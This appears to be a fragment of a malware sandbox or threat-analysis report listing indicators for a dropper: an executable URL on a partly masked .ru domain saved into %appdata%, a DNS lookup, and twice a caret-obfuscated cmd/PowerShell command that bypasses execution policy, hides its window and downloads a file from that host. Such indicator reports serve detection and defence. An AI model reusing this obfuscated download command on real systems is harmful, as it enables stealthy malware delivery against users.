Technical Information
- http://su###-diona.ru/media/editors/uzltsvb1mtx/ssminservp.exe as %appdata%.exe
- http://su###-diona.ru/media/editors/uzltsvb1mtx/ssminservp.exe
- DNS ASK su###-diona.ru
- '<SYSTEM32>\cmd.exe' /c p^ow^ersh^el^L^.ex^e -e^Xec^UtION^P^olIc^Y^ ^bYpass^ -N^o^p^R^OF^i^l^e ^-^wind^ow^stY^Le hid^deN^ ^(n^ew-oB^Ject s^Y^st^em^.^Ne^t^.^we^bclient^)^.d^own^load^Fi^l^e('http://su###-dio...' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c p^ow^ersh^el^L^.ex^e -e^Xec^UtION^P^olIc^Y^ ^bYpass^ -N^o^p^R^OF^i^l^e ^-^wind^ow^stY^Le hid^deN^ ^(n^ew-oB^Ject s^Y^st^em^.^Ne^t^.^we^bclient^)^.d^own^load^Fi^l^e('http://su###-dio...